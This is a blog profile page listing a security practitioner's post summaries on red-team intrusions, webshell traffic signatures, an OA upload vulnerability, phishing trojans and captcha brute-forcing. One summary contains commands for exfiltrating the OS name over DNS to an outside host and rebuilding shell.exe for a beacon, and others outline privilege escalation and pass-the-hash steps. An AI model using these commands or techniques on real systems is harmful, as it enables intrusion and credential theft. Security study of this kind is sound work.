自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

安于心,修于形

一位网络安全人员的笔记,希望能够帮助到你

  • 博客(14)
  • 收藏
  • 关注

原创 phpinfo泄漏在漏洞挖掘过程当中的作用

通过 phpinfo()查看一些特殊的程序服务,比如 redis、memcache、mysql、SMTP、pgsql等等。

2024-03-07 16:30:49 187

原创 冰蝎/哥斯拉-流量特征分析

所有请求中Accept: text/html,application/xhtml+xml,application/xml;所有响应中Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0。所有请求中Cookie中后面都存在;这里我们直接抓取数据包流量进行分析。这里我们直接抓取数据包流量进行分析。请求包当中头数据pass=

2024-03-04 15:58:06 684

原创 蚁剑流量分析-使用编码器解码器的区别

蚁剑与网站进行数据交互的过程中,发送的数据是经过编码器编码后再发送,支持的编码方式有default默认的、base64、chr、chr16、rot13;网站返回的数据经过解码器中的编码方式编码后返回,支持的编码方式有default、base64、rot13。

2024-03-04 01:07:55 623 1

原创 攻防演练-从OA系统到内网

这里运气比较好,直接返回system权限,并提取到了hash。下面就是搭建隧道-远程桌面-内网渗透了,再次不在赘述。通过oa上传webshell。权限为network。将会话传递到MSF上。

2024-03-02 20:07:10 179

原创 攻防演练-从数据库提权到内网环境

这里找到他IP下的http服务,随便在后面加了一个1报错,并报出了路径。直接写入哥斯拉webshell。进行提权(他里面引入了土豆家族提权非常好用),一步到位,提到了system。通过CS,直接提hash,使用mimikatz进行hash传递,进入内网。不过回显只能回显一行,且CS上线代码有点长,执行有语法错误。打开后发现存在sqlserver连接地址端口以及账号密码。开局一个url,扫描扫出来一个bin.zip。不是DBA权限,且权限过低无法执行命令。使用甜土豆提至system,并上线CS。

2024-03-02 18:25:33 550 1

原创 攻防演练-从弱口令到域环境的曲折经历

受害机器介绍:出网,无杀毒设备,有流量检测设备,有域环境。

2024-03-02 17:02:48 817 1

原创 DNS出网机器的艰难上线

powershell -command “Get-Content shell.txt -Encoding Byte -ReadCount 0 | Set-Content shell.exe -Encoding Byte” #生成shell.exe文件。通过ping %os%.xxxxxe4b.log.ofux.top.命令,发现虽然显示连接超时,不过dns这边已经接收到了DNS记录,DNS出网,但不完全出网。#6是93756e4b.log.ofux.top. 点加2。CS对话执行mode dns。

2024-01-08 11:01:08 400

原创 某友CRM存在逻辑漏洞+文件读取漏洞

【代码】某友CRM存在逻辑漏洞+文件读取漏洞。

2024-01-03 18:00:37 548

原创 全网最简单的 burp 验证码识别爆破

点击网页当中的验证码-抓包-将包发送给插件captcha-killer-modified。变量2-选择通过扩展生成-扩展选中captcha-killer-modified-OK。添加-文件选择插件captcha-killer-modified-点击下一个。模板库选择ddddocr-修改端口与python当中的保持一致-点击识别。攻击类型选择Pitchfork,将变量1,2分别设置为密码和验证码。选中识别出的验证码,并将其标记为识别结果。返回验证码即证明插件安装成功。点击识别成功匹配出验证码。

2024-01-03 17:06:23 1196 1

原创 蓝凌OA sysUiComponent 任意文件上传漏洞getshell(文末附批量检测poc)

蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。

2023-12-26 14:54:58 1618

原创 钓鱼-捆绑木马文件

钓鱼 红队

2023-08-01 23:59:39 385

原创 JSfind-信息收集工具

JSfind

2023-05-31 23:09:33 803 1

原创 fofa资产收集-python爬虫

在使用fofa进行搜索资产时,使用api接口调用进行提取时是有限制的,那提取上限怎么办?一个一个负责出来吗?当然不是,而是需要一个无限制爬取的脚本.fofa_token在F12-cookie当中查找复制即可。result.txt是ipf.txt去重后的结果。后面的页数若是(1,5)那便是提取1页到5页.其中search_data填写搜索关键词。ip.txt提取的为原始内容结果如下。ipf.txt提取的为原始内容的IP。

2023-05-12 21:59:01 1368 4

原创 fofa资产收集-cert证书

网站证书序列号是一串数字或字母的唯一标识,它可以用来区分不同的 SSL 证书。每当一个网站颁发一个 SSL 证书时,该证书都会被分配一个唯一的序列号。证书序列号通常是一个十六进制值,可以通过查看证书详细信息来找到它,例如在浏览器中点击地址栏左侧的锁形图标,在弹出的证书信息中查找到证书序列号。

2023-05-11 22:54:15 1578 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除